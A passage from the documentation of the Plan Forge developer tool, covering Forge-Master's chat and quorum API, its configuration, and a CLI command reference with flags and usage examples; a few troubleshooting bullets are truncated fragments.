]}
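A programmatic client could apply a spending limit to that event before letting the quorum proceed. The sketch below parses a single SSE data line and compares the estimate with a budget. The helper names and the budget check are assumptions; the payload fields mirror the example above, with the model list carried under models.

```javascript
// Parses one "data: {...}" line from the stream; returns null for other lines.
function parseSseData(line) {
  if (!line.startsWith("data:")) return null;
  return JSON.parse(line.slice("data:".length).trim());
}

// Hypothetical client-side guard: proceed only if the estimate fits the budget.
function withinBudget(event, maxUSD) {
  return event.type === "quorum-estimate" && event.estimatedUSD <= maxUSD;
}

const line =
  'data: {"type":"quorum-estimate","estimatedUSD":0.0142,"models":[' +
  '{"name":"claude-opus-4.7","estUSD":0.0061},' +
  '{"name":"gpt-5.3-codex","estUSD":0.0048},' +
  '{"name":"grok-4.20","estUSD":0.0033}]}';

const estimate = parseSseData(line);
console.log(estimate.models.map((m) => m.name));
console.log(withinBudget(estimate, 0.01), withinBudget(estimate, 0.02));
```

A client that decides not to proceed would then use the approval endpoint listed in the API table to cancel; the request format for that call is not shown here.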
After all replies arrive, Forge-Master runs a keyword-frequency divergence analysis across the reply texts and emits a dissent: { topic, axis } summary. Topic is what the models disagreed about; axis is the dimension of disagreement (timing, scope, model choice, etc.). The dashboard renders this as a one-line summary above the three replies so you can see the disagreement before reading.
Quorum dispatch uses Promise.allSettled with a 60s hard timeout per model. If 1 of 3 fails or times out, the remaining replies are returned with a partial: true flag. If all fail, the response is { ok: false, code: "QUORUM_ALL_FAILED" }.
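The dispatch pattern named above, Promise.allSettled plus a per-model timeout, looks roughly like the following. This is a sketch of the general technique rather than Forge-Master's implementation: withTimeout, summarizeQuorum, dispatchQuorum, and the { name, ask } model shape are hypothetical, while the 60 s default, the partial flag, and the QUORUM_ALL_FAILED code come from the text.

```javascript
// Rejects if the wrapped promise does not settle within `ms` milliseconds.
function withTimeout(promise, ms) {
  let timer;
  const timeout = new Promise((_, reject) => {
    timer = setTimeout(() => reject(new Error(`timed out after ${ms} ms`)), ms);
  });
  return Promise.race([promise, timeout]).finally(() => clearTimeout(timer));
}

// Turns Promise.allSettled results into the response shape described above.
function summarizeQuorum(settled, modelNames) {
  const replies = [];
  settled.forEach((result, i) => {
    if (result.status === "fulfilled") {
      replies.push({ model: modelNames[i], reply: result.value });
    }
  });
  if (replies.length === 0) return { ok: false, code: "QUORUM_ALL_FAILED" };
  const response = { ok: true, replies };
  if (replies.length < settled.length) response.partial = true;
  return response;
}

// `models` is an array of { name, ask(prompt) => Promise<string> } (assumed shape).
async function dispatchQuorum(models, prompt, timeoutMs = 60_000) {
  const settled = await Promise.allSettled(
    models.map((m) => withTimeout(m.ask(prompt), timeoutMs))
  );
  return summarizeQuorum(settled, models.map((m) => m.name));
}
```

Promise.allSettled never rejects, so one slow or failing model cannot discard the replies that did arrive; the timeout wrapper simply converts a stalled call into a rejected entry.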
| Method | Endpoint / tool | Description |
|---|---|---|
| MCP tool | forge_master_ask | One-shot reasoning. Accepts { message, sessionId? }; returns lane, via, toolCalls[], reply, costUSD. |
| POST | /api/forge-master/chat | Start a chat session (or continue an existing one with sessionId). Returns { sessionId, ... }. Pair with the SSE stream below to receive incremental tokens. |
| GET | /api/forge-master/chat/:sessionId/stream | Server-Sent Events stream for the session. Emits classification, quorum-estimate (if advisory triggers), tool-call, tool-result, delta (token chunks), done. |
| POST | /api/forge-master/chat/:sessionId/approve | Resolve a pending approval prompt mid-stream (used by quorum-estimate cancel, gated tool calls). |
| GET | /api/forge-master/session/:sessionId | Last ~10 turns for the session, for transcript replay. |
| GET | /api/forge-master/sessions | Recent sessions list. |
| GET | /api/forge-master/prompts | Prompt catalog used by the Studio sidebar. |
| GET | /api/forge-master/capabilities | Server capabilities snapshot (models, tier, advisory mode). |
| GET | /api/forge-master/cache-stats | Embedding cache liveliness: { size, hitRate, maxSize: 500 }. Use as a health probe. |
| GET / PUT | /api/forge-master/prefs | Read / write per-project Forge-Master preferences. Schema: { tier, autoEscalate, quorumAdvisory, embeddingFallback }. GET returns current values; PUT writes to .forge/fm-prefs.json. |
Forge-Master config lives under forgeMaster in .forge.json. All fields are optional; sensible defaults apply:
{
"forgeMaster": {
"reasoningModel": "claude-opus-4.6", // model used for replies in advisory lane
"routerModel": "grok-3-mini", // model used by stage-2 intent classifier
"quorumAdvisory": "auto", // "off" | "auto" | "always"
"embeddingFallback": true, // enable stage 1.5 embedding cache
"discoverExtensionTools": true, // allow extension-supplied tools to register
"providers": {
"githubCopilot": { "model": "gpt-4o" } // GitHub Models override (zero-key path)
}
}
}
| Field | Default | What it controls |
|---|---|---|
| reasoningModel | model.default (or gpt-4o-mini) | Model used to compose replies in advisory lane. Falls back to .forge.json's top-level model.default. |
| routerModel | grok-3-mini | Stage-2 intent classifier model. Cheap by design: it's classifying, not reasoning. |
| quorumAdvisory | "off" | Enables Quorum Advisory Mode in the advisory lane. |
| embeddingFallback | true | Enables the stage 1.5 embedding cache. Disable to force every cache-miss to the router LLM. |
| discoverExtensionTools | true | Allow extensions in extensions/ to register tools that Forge-Master can call. |
| providers.githubCopilot.model | gpt-4o-mini | Model used when routing through GitHub Models (zero-key path with gh auth login). |
The recommended setup path requires no API keys: run gh auth login once and Forge-Master auto-detects your GitHub token, then routes through GitHub Models. GitHub Copilot subscribers get this for free.
Set ANTHROPIC_API_KEY, OPENAI_API_KEY, or XAI_API_KEY only if you want to override the default with a premium model directly. The dashboard Settings → API Keys tab is the GUI equivalent.
The stage 1.5 cache is small, opinionated, and zero-config:
- Storage: .forge/fm-sessions/embedding-cache.bin (binary Float32Array) plus a JSON metadata sidecar
- Hits are reported as via: "embedding-cache"
- Embedder: all-MiniLM-L6-v2 via @xenova/transformers (lazy-loaded). When the package isn't installed, the cache uses a deterministic 32-bit hash bag-of-words baseline (hash-bag). Both produce 384-dim vectors that are L2-normalized.
- Stats: GET /api/forge-master/cache-stats returns { size, hitRate, maxSize: 500 }
- Opt out: set embeddingFallback: false in prefs to force every cache-miss to the router LLM. Useful when you're tuning intent vocabularies and want to measure raw stage-2 behavior.
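To show what a hash bag-of-words embedding with L2 normalization means in practice, here is a minimal sketch. The manual does not say which 32-bit hash or tokenizer the fallback uses, so the FNV-1a style hash, the alphanumeric tokenizer, and the function names are assumptions; the 384 dimensions, the normalization, and the cosine comparison follow the text.

```javascript
const DIMS = 384;

// FNV-1a style 32-bit hash (an assumed choice of hash function).
function hash32(text) {
  let hash = 0x811c9dc5;
  for (let i = 0; i < text.length; i++) {
    hash ^= text.charCodeAt(i);
    hash = Math.imul(hash, 0x01000193) >>> 0;
  }
  return hash;
}

// Counts tokens into hashed buckets, then scales the vector to unit length.
function hashBagEmbed(text) {
  const vec = new Float32Array(DIMS);
  const tokens = text.toLowerCase().match(/[a-z0-9]+/g) || [];
  for (const token of tokens) vec[hash32(token) % DIMS] += 1;
  let norm = 0;
  for (const v of vec) norm += v * v;
  norm = Math.sqrt(norm);
  if (norm > 0) {
    for (let i = 0; i < DIMS; i++) vec[i] /= norm;
  }
  return vec;
}

// For L2-normalized vectors, cosine similarity is just the dot product.
function cosine(a, b) {
  let dot = 0;
  for (let i = 0; i < a.length; i++) dot += a[i] * b[i];
  return dot;
}

const stored = hashBagEmbed("why did slice 4 fail");
const incoming = hashBagEmbed("why did slice 4 fail again");
console.log(cosine(stored, incoming) >= 0.85 ? "cache hit" : "cache miss");
```

Because this is a bag of words, word order is ignored and similarity depends only on shared tokens, which is why the manual recommends installing the real embedder when the fallback isn't matching well.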
Open localhost:3100/dashboard → Studio. Three panels:
- Calls POST /api/forge-master/chat to start, then subscribes to GET /api/forge-master/chat/:sessionId/stream. Shows live classification badge, tool-call trace as each tool fires, and the streaming reply token-by-token.
Forge-Master turns also surface in the unified Timeline tab as fm-turn events (added v2.82). Each turn carries the lane, the user message (truncated to 200 chars), and the turn number, which is useful for retrospectives.
| Command | What it does |
|---|---|
| pforge forge-master status | Health check: server up, cache loaded, last classification |
| pforge forge-master logs [--tail N] | Tail recent turns from .forge/fm-sessions/*.jsonl |
- offtopic. Check the via field in the response; if it says "keyword", the keyword scorer didn't match. Rephrase using one of the keyword-rich phrasings ("status of …", "why did … fail", "should we …"), or wait until embedding-cache warms up.
- "auto"
- "always" to remove the gating during testing, then revert. Note that operational/troubleshoot/build lanes are hard-blocked regardless of mode.
- @xenova/transformers isn't installed and the hash-bag fallback isn't matching well, install the peer dep for better embeddings; (3) embeddingFallback: false in prefs disables the stage entirely.
- gh auth login (zero-key path), set ANTHROPIC_API_KEY / OPENAI_API_KEY / XAI_API_KEY, or set forgeMaster.reasoningModel in .forge.json.
- offtopic
- routerModel from grok-3-mini to grok-4 or gpt-4o-mini. The router runs once per prompt; small models are usually fine, but quirky vocabularies sometimes need more capability.
Every command, every flag, every example. The chapter you bookmark.
The pforge CLI is a convenience wrapper: two scripts, no dependencies beyond Git and your shell. Every command shows the equivalent manual steps, so non-CLI users can follow along.
| Platform | File | Usage |
|---|---|---|
| Windows / PowerShell | pforge.ps1 | .\pforge.ps1 <command> |
| macOS / Linux / Bash | pforge.sh | ./pforge.sh <command> |
Both scripts are installed by setup.ps1 / setup.sh. If they're missing, copy them manually from the Plan Forge repo.
- pforge analyze scores a plan's quality (traceability, coverage, gates, 0 to 100).
- forge_diagnose (MCP tool) investigates a bug in code (root cause, fix recommendations).
Most people don't need every command. Find your use case, then run the matching command:
| Goal | Command | When |
|---|---|---|
| Setup & daily housekeeping | ||
| Set up a new project | pforge init | First time on this repo |
| Check setup is healthy | pforge smith | Before reporting a bug; after upgrading |
| Validate file counts and templates | pforge check | Before committing setup changes |
| Update framework files | pforge update | After a new Plan Forge release |
| Planning & authoring | ||
| Start a new feature plan | pforge new-phase <name> | You have a feature in mind |
| Score a plan's quality before running it | pforge analyze <plan> | Right after hardening |
| See what files changed vs the plan's scope | pforge diff <plan> | Mid-execution; before commit |
| Find leftover TODO/FIXME/HACK markers | pforge sweep | Before declaring a slice done |
| Execution | ||
| Estimate cost before running | pforge run-plan <plan> --estimate | You want to know what this will cost first |
| Run a plan end-to-end (cheapest) | pforge run-plan <plan> | Plan is hardened and you trust it |
| Run with multi-model consensus | pforge run-plan <plan> --quorum=auto | High-stakes feature; complex slices |
| Resume after a failed slice | pforge run-plan <plan> --resume-from N | You fixed slice N−1's failure |
| Co-pilot mode (you code, gates check) | pforge run-plan <plan> --assisted | You want to write the code yourself |
| Troubleshooting | ||
| Investigate a failing slice | forge_diagnose({ file: "…" }) (MCP tool) | Slice failed and you don't know why |
| Run closed-loop drain | pforge audit-loop | Mass content audit (opt-in feature) |
| See chronological event history | pforge timeline | Forensic / "what happened on Tuesday?" |
| Post-deploy (LiveGuard) | ||
| Score code drift since baseline | pforge drift | After every deploy |
| Scan for high-entropy secrets | pforge secret-scan | Before every deploy (blocking) |
| Scan dependencies for CVEs | pforge dep-watch | Daily / before deploy |
| Compute health score 0–100 | pforge health-trend | Weekly / on alert |
Full command reference below, organized alphabetically. Each entry has the equivalent manual steps for non-CLI users.
setup.ps1 / setup.sh.
| Flag | Type | Description |
|---|---|---|
-Preset | string | Tech preset: dotnet, typescript, python, java, go, swift, rust, php, azure-iac. Comma-separated for multi-preset. |
-ProjectPath | path | Target project directory (default: current dir) |
-Agent | string | Agent adapter: copilot, claude, cursor, codex, gemini, windsurf, generic, all |
.\pforge.ps1 init -Preset dotnet
.\pforge.ps1 init -Preset typescript -ProjectPath ./my-app
.\pforge.ps1 init -Preset dotnet -Agent all
./pforge.sh init --preset dotnet
./pforge.sh init --preset typescript --path ./my-app
./pforge.sh init --preset dotnet --agent all
.\setup.ps1 / ./setup.sh with your preferred parameters
validate-setup.ps1 / validate-setup.sh.
pforge check
.\validate-setup.ps1
DEPLOYMENT-ROADMAP.md with their current status.
pforge status
Phase Status (from DEPLOYMENT-ROADMAP.md):
─────────────────────────────────────────────
Phase 1: User Authentication 📋 Planned
Phase 2: Dashboard Widgets 🚧 In Progress
| Arg / Flag | Type | Description |
|---|---|---|
| name | string (required) | Phase name, e.g. user-auth |
| --dry-run | boolean | Preview without creating |
.\pforge.ps1 new-phase user-auth --dry-run
.\pforge.ps1 new-phase user-auth
docs/plans/Phase-3-USER-AUTH-PLAN.md from template
DEPLOYMENT-ROADMAP.md
| Arg / Flag | Type | Description |
|---|---|---|
| plan | path (required) | Path to plan file |
| --dry-run | boolean | Preview without creating |
.\pforge.ps1 branch docs/plans/Phase-3-USER-AUTH-PLAN.md --dry-run
.\pforge.ps1 branch docs/plans/Phase-3-USER-AUTH-PLAN.md
| Arg / Flag | Type | Description |
|---|---|---|
| plan | path (required) | Path to plan file |
| slice | number (required) | Slice number |
| --dry-run | boolean | Preview commit message without committing |
.\pforge.ps1 commit docs/plans/Phase-3.md 2 --dry-run
.\pforge.ps1 commit docs/plans/Phase-3.md 2
| Arg | Type | Description |
|---|---|---|
| plan | path (required) | Path to plan file |
| status | enum (required) | planned · in-progress · complete · paused |
.\pforge.ps1 phase-status docs/plans/Phase-3.md in-progress
.\pforge.ps1 phase-status docs/plans/Phase-3.md complete
pforge sweep
Completeness Sweep, scanning for deferred-work markers:
─────────────────────────────────────────────────────────
src/Services/UserService.cs:42: // TODO: Wire to real email service
src/Controllers/AuthController.cs:18: // FIXME: Add rate limiting
FOUND 2 deferred-work marker(s). Resolve before Step 5 (Review Gate).
Also available as: forge_sweep MCP tool
.\pforge.ps1 diff docs/plans/Phase-3-USER-AUTH-PLAN.md
Scope Drift Check, 4 changed file(s) vs plan:
──────────────────────────────────────────────────
✓ IN SCOPE src/Services/UserService.cs
✓ IN SCOPE src/Repositories/UserRepository.cs
● UNPLANNED src/Config/AppSettings.cs
● FORBIDDEN tests/Legacy/OldTests.cs
DRIFT DETECTED, 1 forbidden file(s) touched.
Also available as: forge_diff MCP tool
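The report above sorts each changed file into one of three buckets. A minimal sketch of that classification follows, assuming simple path-prefix matching; the `classifyChanges` helper and the `inScope` / `forbidden` field names are hypothetical and are not taken from the pforge source.

```javascript
// Hypothetical helper: classify changed files against a plan's scope lists.
// Prefix matching and the field names are assumptions made for illustration.
function classifyChanges(changedFiles, scope) {
  const startsWithAny = (file, prefixes) => prefixes.some((p) => file.startsWith(p));
  return changedFiles.map((file) => {
    // Forbidden is checked first so a forbidden path can never count as in scope.
    if (startsWithAny(file, scope.forbidden)) return { file, status: "FORBIDDEN" };
    if (startsWithAny(file, scope.inScope)) return { file, status: "IN SCOPE" };
    return { file, status: "UNPLANNED" };
  });
}

const report = classifyChanges(
  ["src/Services/UserService.cs", "src/Config/AppSettings.cs", "tests/Legacy/OldTests.cs"],
  { inScope: ["src/Services/", "src/Repositories/"], forbidden: ["tests/Legacy/"] }
);

// In this sketch, drift is reported only when a forbidden file was touched.
const driftDetected = report.some((entry) => entry.status === "FORBIDDEN");
console.log(report, driftDetected);
```

Checking the forbidden list before the in-scope list is a design choice of the sketch: it keeps an overly broad in-scope prefix from masking a forbidden edit.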
| Flag | Type | Description |
|---|---|---|
| --quorum | boolean | Multi-model consensus analysis |
| --mode | plan \| file | Explicit analysis mode (auto-detected if omitted) |
| --models | string | Comma-separated model override |
# Single-model analysis
.\pforge.ps1 analyze docs/plans/Phase-1-AUTH-PLAN.md
# Multi-model quorum
.\pforge.ps1 analyze docs/plans/Phase-1-AUTH-PLAN.md --quorum
# Analyze a code file directly
.\pforge.ps1 analyze src/services/billing.ts --mode file
| Dimension | Points | What It Checks |
|---|---|---|
| Traceability | 25 | MUST/SHOULD criteria exist, slices defined, criteria mapped to slices |
| Coverage | 25 | Changed files within Scope Contract, no forbidden edits |
| Test Coverage | 25 | MUST criteria matched against test files via keyword fuzzy matching |
| Gates | 25 | Validation gates referenced in slices, no deferred-work markers |
Exit codes: 0 = pass (≥60), 1 = fail (<60). Also available as: forge_analyze MCP tool.
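The scoring arithmetic can be sketched as follows: four dimensions worth 25 points each, summed to a 0 to 100 total, with 60 as the pass mark. The `summarize` function and the property names are hypothetical; how each dimension's points are actually awarded is not shown here.

```javascript
// Illustrative only: combines per-dimension points into a total and an exit code.
// Property names are assumptions; the real analyzer's internals are not documented here.
const DIMENSIONS = ["traceability", "coverage", "testCoverage", "gates"];
const MAX_PER_DIMENSION = 25;
const PASS_THRESHOLD = 60;

function summarize(scores) {
  let total = 0;
  for (const name of DIMENSIONS) {
    const value = scores[name] ?? 0; // a missing dimension contributes nothing
    if (value < 0 || value > MAX_PER_DIMENSION) {
      throw new RangeError(`${name} must be between 0 and ${MAX_PER_DIMENSION}`);
    }
    total += value;
  }
  // Exit code 0 means pass (total of 60 or more), 1 means fail.
  return { total, exitCode: total >= PASS_THRESHOLD ? 0 : 1 };
}

console.log(summarize({ traceability: 25, coverage: 20, testCoverage: 10, gates: 5 }));
```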
pforge diagnose CLI command.
| Parameter | Type | Description |
|---|---|---|
| file (required) | string | Path to the source file to investigate (e.g., src/services/billing.ts) |
| models | string | Comma-separated model override (default: quorum config models) |
| path | string | Project directory (default: current) |
forge_diagnose({ file: "src/services/billing.ts" })
forge_diagnose({ file: "src/auth/token-validator.ts", models: "grok-3-mini,grok-4" })
Each model analyzes independently for: root cause, failure modes, reproduction steps, impact assessment, fix recommendations, regression risk. Results are returned inline to the calling agent (no on-disk persistence by default).
Reference: pforge-mcp/tools.json » forge_diagnose. Adjacent CLI command: pforge analyze for plan quality (different surface).
| Flag | Type | Default | Description |
|---|---|---|---|
| --estimate | boolean | — | Cost prediction only, no execution. Always backed by forge_estimate_quorum, never hand-computed. |
| --assisted | boolean | — | Human codes, orchestrator validates gates |
| --model | string | — | Model override (e.g., claude-sonnet-4.6) |
| --resume-from | number | — | Skip completed slices, resume from N |
| --dry-run | boolean | — | Parse and validate without executing |
| --quorum | auto \| power \| speed \| false | auto | Quorum preset. auto: threshold-based escalation. power: flagship models, threshold 5 (premium tier). speed: fast models, threshold 7. false: disable. |
| --quorum-threshold | number | 6 | Override the complexity threshold for auto-quorum (1–10). Implied by --quorum=power\|speed. |
# Estimate cost without executing (always tool-backed via forge_estimate_quorum)
.\pforge.ps1 run-plan docs/plans/Phase-7.md --estimate
# Full auto execution
.\pforge.ps1 run-plan docs/plans/Phase-7.md
# Assisted mode
.\pforge.ps1 run-plan docs/plans/Phase-7.md --assisted
# Resume from slice 3 after fixing a failure
.\pforge.ps1 run-plan docs/plans/Phase-7.md --resume-from 3
# Quorum presets (v2.82)
.\pforge.ps1 run-plan docs/plans/Phase-7.md --quorum=power # flagship models, threshold 5
.\pforge.ps1 run-plan docs/plans/Phase-7.md --quorum=speed # fast models, threshold 7
.\pforge.ps1 run-plan docs/plans/Phase-7.md --quorum=auto --quorum-threshold 8
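How the presets and the threshold override interact can be sketched like this. The default values come from the flag table; the function names, the rule that an explicit `--quorum-threshold` wins over the preset value, and the "at or above the threshold" comparison are assumptions for illustration.

```javascript
// Sketch of preset resolution. Threshold defaults are from the flag table;
// everything else (names, precedence, comparison) is an assumption.
const PRESET_THRESHOLDS = { auto: 6, power: 5, speed: 7 };

function resolveQuorum(preset = "auto", thresholdOverride) {
  if (preset === "false" || preset === false) return { enabled: false };
  if (!Object.hasOwn(PRESET_THRESHOLDS, preset)) {
    throw new Error(`Unknown quorum preset: ${preset}`);
  }
  const threshold = thresholdOverride ?? PRESET_THRESHOLDS[preset];
  if (!Number.isInteger(threshold) || threshold < 1 || threshold > 10) {
    throw new RangeError("Quorum threshold must be an integer from 1 to 10");
  }
  return { enabled: true, preset, threshold };
}

// Assumption: a slice escalates to quorum when its complexity is at or above the threshold.
function usesQuorum(config, sliceComplexity) {
  return config.enabled && sliceComplexity >= config.threshold;
}

console.log(resolveQuorum("auto", 8), usesQuorum(resolveQuorum("speed"), 7));
```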
| Mode | Flag | What Happens |
|---|---|---|
| Full Auto | (default) | gh copilot CLI executes each slice with full project context. Routing honors a host-aware preference so non-Copilot hosts (Claude Code, Cursor, Windsurf, Zed) prefer direct API to honor your subscription. |
| Assisted | --assisted | You code in VS Code; orchestrator prompts and validates gates |
| Estimate | --estimate | Shows slice count, token estimate, and cost, without executing. Returns the same numbers as the forge_estimate_quorum tool. |
Results written to: .forge/runs/<timestamp>/. Also available as: forge_run_plan MCP tool.
FIX: suggestion.
pforge smith
| Category | Checks |
|---|---|
| Environment | git, VS Code CLI, PowerShell/bash version, GitHub CLI |
| VS Code Config | chat.agent.enabled, chat.useCustomizationsInParentRepositories, chat.promptFiles |
| Setup Health | .forge.json valid, copilot-instructions.md exists, file counts match preset |
| Version Currency | Installed templateVersion vs source VERSION |
| Common Problems | Duplicate instructions, orphaned agents, missing applyTo, unresolved placeholders |
Also available as: forge_smith MCP tool.
| Subcommand | Description |
|---|---|
| ext search [query] | Browse the community catalog. Omit query for all extensions. |
| ext add <name> | Download and install from catalog in one step. |
| ext info <name> | Show detailed info before installing. |
| ext install <path> | Install from a local directory path. |
| ext list | List all installed extensions. |
| ext remove <name> | Remove an installed extension. |
| ext publish <path> | Generate a catalog entry for submission via PR. |
.\pforge.ps1 ext search saas
.\pforge.ps1 ext add saas-multi-tenancy
.\pforge.ps1 ext info plan-forge-memory
.\pforge.ps1 ext list
.\pforge.ps1 ext remove healthcare-compliance
.\pforge.ps1 ext publish .forge/extensions/my-extension
Also available as: forge_ext_search, forge_ext_info MCP tools.
| Flag | Type | Description |
|---|---|---|
| source | path (optional) | Plan Forge source path (auto-detects ../plan-forge) |
| --dry-run | boolean | Preview changes without applying |
| --force | boolean | Skip confirmation prompt |
.\pforge.ps1 update
.\pforge.ps1 update C:\path\to\plan-forge --dry-run
.\pforge.ps1 update --force
| Updated (safe to replace) | Never Touched (your files) |
|---|---|
| Pipeline prompts, agents, shared instructions, runbook, lifecycle hooks, new preset files | copilot-instructions.md, project-profile, project-principles, DEPLOYMENT-ROADMAP.md, .forge.json, plan files, existing preset files |
If pforge.ps1 doesn't have the update command yet (pre-v1.2.1), download the latest script first, then run pforge update.
pforge help
.forge.json → audit.mode = "auto" | "always", or use --auto to respect the config.
| Flag | Type | Default | Description |
|---|---|---|---|
| --auto | boolean | — | Respect .forge.json#audit.mode, skip cleanly if off |
| --max | number | 5 | Maximum drain rounds before terminating |
| --dry-run | boolean | — | Scan + triage but skip fix dispatch |
| --env | dev \| staging | dev | Environment name passed to content-audit scanner. Production is hard-blocked unless allowProduction: true in scanner opts. |
# One-shot manual drain (3 rounds max, dry-run)
pforge audit-loop --max 3 --dry-run
# Respect .forge.json#audit config (most common in CI)
pforge audit-loop --auto
# Drain against staging
pforge audit-loop --auto --env staging
bug (registers in the bug registry), spec (submits to Crucible for re-smelting), or classifier (writes a local proposal artifact under .forge/audits/ for human review). The classifier-reviewer agent in .github/agents/ can audit the classifier's lane choices read-only.
Also available as: forge_tempering_drain MCP tool, POST /api/tempering/drain REST endpoint, and the /audit-loop slash-command skill in chat.
| Flag | Type | Default | Description |
|---|---|---|---|
| --window | duration | 24h | Lookback window (e.g., 1h, 24h, 7d) |
| --from / --to | ISO datetime | — | Explicit range (overrides --window) |
| --source | string | all | Filter to one source: run, incident, bug, deploy, crucible, fm-turn, memory, tempering, watch |
| --correlation | string | — | Filter to one correlation id (run id, incident id, etc.) |
| --group-by | source \| hour \| day | — | Bucket events for a summary view |
| --limit | number | 200 | Max events returned |
| --json | boolean | — | Machine-readable JSON output |
# Last 24h, all sources
pforge timeline
# Last hour, only Forge-Master turns
pforge timeline --window 1h --source fm-turn
# Everything tied to one run
pforge timeline --correlation run-2026-05-04T120000
# Daily summary for the past week, grouped by source
pforge timeline --window 7d --group-by source
# JSON for piping into jq / scripts
pforge timeline --window 24h --json | jq '.[] | select(.source == "incident")'
Also available as: forge_timeline MCP tool, GET /api/timeline REST endpoint, and the Timeline tab on the dashboard.
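The `--window`, `--source`, and `--limit` filters can be pictured as a small pipeline over event records. The sketch below is illustrative only: the `timestamp` field and both function names are hypothetical (the `source` field does appear in the jq example above), and only the `h` and `d` duration units shown in this section are handled.

```javascript
// Illustrative filter pipeline. The `timestamp` field name is an assumption.
const UNIT_MS = { h: 60 * 60 * 1000, d: 24 * 60 * 60 * 1000 };

// Convert a duration such as "1h", "24h", or "7d" into milliseconds.
function parseWindow(text) {
  const match = /^(\d+)([hd])$/.exec(text);
  if (!match) throw new Error(`Unsupported window: ${text}`);
  return Number(match[1]) * UNIT_MS[match[2]];
}

function filterEvents(events, { window = "24h", source, limit = 200, now = Date.now() } = {}) {
  const cutoff = now - parseWindow(window);
  return events
    .filter((event) => Date.parse(event.timestamp) >= cutoff) // inside the lookback window
    .filter((event) => !source || event.source === source)    // optional source filter
    .slice(0, limit);                                         // cap the result size
}

console.log(parseWindow("7d"));
```

Passing `now` explicitly keeps the function deterministic, which makes it easy to exercise against recorded event logs.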
Post-coding intelligence commands. All run locally, no network unless openclaw.endpoint is configured.
pforge drift
pforge drift --since HEAD~5
Also available as: forge_drift_report MCP tool.
resolvedAt for MTTR tracking.
| Flag | Type | Description |
|---|---|---|
| --severity | enum | critical · high · medium · low |
| --files | string | Comma-separated affected file paths, e.g. src/api/handler.ts |
pforge incident "Auth token validation bypass" --severity critical --files src/auth/validator.ts
pforge incident "Slow query on dashboard load" --severity medium
| Flag | Type | Description |
|---|---|---|
| --min-severity | enum | Filter by minimum severity: critical · high · medium · low |
| --max | number | Maximum number of results to display |
pforge triage
pforge triage --min-severity medium --max 10
| Flag | Type | Description |
|---|---|---|
| --version | string | Deployment version, e.g. v2.27.0 |
| --env | string | Target environment, e.g. production |
| --status | enum | success · failure · rollback |
pforge deploy-log --version v2.27.0 --env production --status success
pforge deploy-log --version v2.27.0 --env staging --status failure
| Flag | Type | Description |
|---|---|---|
| --plan | path | Path to plan file, e.g. docs/plans/Phase-LiveGuard-v2.27.0-PLAN.md |
pforge regression-guard --plan docs/plans/Phase-LiveGuard-v2.27.0-PLAN.md
| Flag | Type | Description |
|---|---|---|
| --plan | path | Path to plan file |
pforge runbook --plan docs/plans/Phase-7-DASHBOARD-PLAN.md
| Flag | Type | Description |
|---|---|---|
| --top | number | Number of files to display (default: 10) |
| --since | string | Git log time range, e.g. "3 months ago" |
pforge hotspot
pforge hotspot --top 15 --since "3 months ago"
pforge dep-watch
| Flag | Type | Description |
|---|---|---|
| --since | string | Git ref range to scan, e.g. HEAD~3 |
| --threshold | number | Entropy threshold for detection (default: 4.5), e.g. 4.0 |
pforge secret-scan
pforge secret-scan --since HEAD~3 --threshold 4.0
Also available as: forge_secret_scan MCP tool.
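To give a feel for what an entropy threshold of 4.5 means, here is a sketch that computes Shannon entropy in bits per character and compares it to the threshold. That the scanner uses exactly this measure is an assumption, and both function names are hypothetical.

```javascript
// Shannon entropy in bits per character. Whether the scanner uses exactly
// this measure is an assumption; the 4.5 default is from the flag table.
function shannonEntropy(text) {
  const chars = [...text]; // iterate by code point
  if (chars.length === 0) return 0;
  const counts = new Map();
  for (const ch of chars) counts.set(ch, (counts.get(ch) ?? 0) + 1);
  let entropy = 0;
  for (const count of counts.values()) {
    const p = count / chars.length;
    entropy -= p * Math.log2(p);
  }
  return entropy;
}

function looksLikeSecret(token, threshold = 4.5) {
  return shannonEntropy(token) >= threshold;
}

console.log(shannonEntropy("password"), looksLikeSecret("password"));
```

Lowering the threshold (for example to 4.0, as in the command above) flags more strings, at the cost of more false positives on ordinary identifiers.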
.env files. Keys only, values are never read.
| Flag | Type | Description |
|---|---|---|
| --baseline | path | Baseline env file, e.g. .env |
| --files | string | Comma-separated env files to compare, e.g. .env.staging,.env.production |
pforge env-diff
pforge env-diff --baseline .env --files .env.staging,.env.production
Also available as: forge_env_diff MCP tool.
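A keys-only comparison can be sketched as below. The parsing rules (skip blank lines and `#` comments, tolerate an `export ` prefix) and the `missing` / `extra` result shape are assumptions for illustration, not the tool's documented behavior.

```javascript
// Collect only the key names from .env-style content; values are discarded.
// Parsing rules here are assumptions made for the sketch.
function envKeys(content) {
  const keys = new Set();
  for (const rawLine of content.split(/\r?\n/)) {
    const line = rawLine.trim();
    if (line === "" || line.startsWith("#")) continue; // blank line or comment
    const eq = line.indexOf("=");
    if (eq <= 0) continue; // not a KEY=value line
    keys.add(line.slice(0, eq).replace(/^export\s+/, "").trim());
  }
  return keys;
}

// Compare one env file against the baseline by key name only.
function diffKeys(baselineContent, otherContent) {
  const base = envKeys(baselineContent);
  const other = envKeys(otherContent);
  return {
    missing: [...base].filter((key) => !other.has(key)), // in baseline, absent in other
    extra: [...other].filter((key) => !base.has(key)),   // in other, absent in baseline
  };
}

console.log(diffKeys("DB_URL=x\nAPI_KEY=y\n", "DB_URL=z\nFEATURE_FLAG=1\n"));
```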
| Flag | Type | Description |
|---|---|---|
| --days | number | Number of days to include (default: 14), e.g. 30 |
pforge health-trend
pforge health-trend --days 30
| Flag | Type | Description |
|---|---|---|
| --source | enum (required) | regression · drift · incident · secret |
| --incident-id | string (optional) | Specific incident ID (used when source=incident) |
pforge fix-proposal --source regression
pforge fix-proposal --source drift
pforge fix-proposal --source secret
pforge fix-proposal --source incident --incident-id INC-2026-04-001
Also available as: forge_fix_proposal MCP tool, POST /api/fix/propose REST endpoint (requires auth).
docs/plans/auto/LIVEGUARD-FIX-*.md and fill in the TODO markers, then pforge run-plan --assisted <plan> on a branch.
| Flag | Type | Description |
|---|---|---|
| --source | enum (required) | drift · triage · incident · runbook · fix-proposal |
| --goal | enum (optional) | root-cause · risk-assess (default) · fix-review · runbook-validate |
| --custom-question | string (optional) | Freeform question that overrides --goal (max 500 chars) |
| --quorum-size | number (optional) | Model vote count requested in the prompt (default 3) |
pforge quorum-analyze --source triage
pforge quorum-analyze --source drift --goal root-cause
pforge quorum-analyze --source incident --custom-question "Which fix should I prioritize given the sprint deadline?"
Also available as: forge_quorum_analyze MCP tool, POST /api/quorum/prompt REST endpoint (no auth required).
